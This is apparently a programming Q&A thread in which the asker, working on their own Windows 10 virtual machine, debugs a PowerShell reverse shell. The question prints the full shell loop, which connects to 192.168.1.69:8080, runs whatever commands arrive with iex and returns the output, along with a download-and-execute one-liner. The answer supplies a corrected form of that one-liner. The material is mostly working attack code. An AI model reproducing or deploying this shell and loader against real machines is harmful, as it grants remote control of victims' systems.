# PowerShell issue to invoke shell

Tags: powershell

Im trying to get a shell in my Win10 virtual machine but i get these 
[errors](https://i.stack.imgur.com/owJiZ.png).

PS C:\Users\Diego Sepu> IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.69/r.ps1')

IEX : At line:13 char:39

... s.TCPClient("192.168.1.69\'94,8080)).GetStream();[byte[]]$bt=0..65535 ...

The string is missing the terminator: ".

At line:14 char:2

}

~

Missing closing ')' in expression.

At line:1 char:1

{\rtf1\ansi\ansicpg1252\cocoartf1504\cocoasubrtf820

~

Missing closing '}' in statement block or type definition.

At line:1 char:1

IEX (New-Object Net.WebClient).DownloadString(...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException

FullyQualifiedErrorId : TerminatorExpectedAtEndOfString,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Code:

```
$sm=(New-Object Net.Sockets.TCPClient("192.168.1.69",8080)).GetStream()
[byte[]]$bt=0..65535|%{0}
while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0)
{
    $d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i)
    $st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1))
    $sm.Write($st,0,$st.Length)
}
```

Comment: Please [edit] you code so it is not running as one single line. Makes it harder to look at the flow of the code. Also  include the error text in the body of the question as well as images cannot be scraped for text

Comment: Looks like a lot of syntax errors. Try replacing the semicolons with some newlines and use some indentation to make your brackets easier to see.

Comment: I changed the code, this one is smaller, but still has errors, any suggestions?

Comment: See my edit, hopefully that makes it easier for people to help.

Comment: Please [format your code and sample input/output properly](http://meta.stackexchange.com/a/22189/248777).

Answer (score 0):

`(new-object Net.WebClient).DownloadString("http://192.168.1.69:8080/r.ps1") | iex`

Try doing `downloadstring` first then piping the results into `invoke-espression` In your original screenshot you aren't invoking the contents of `r.ps1` infact you are attempting to invoke the download itself. By piping the results of `DownloadString`the actual contents of `r.ps1` will be extecute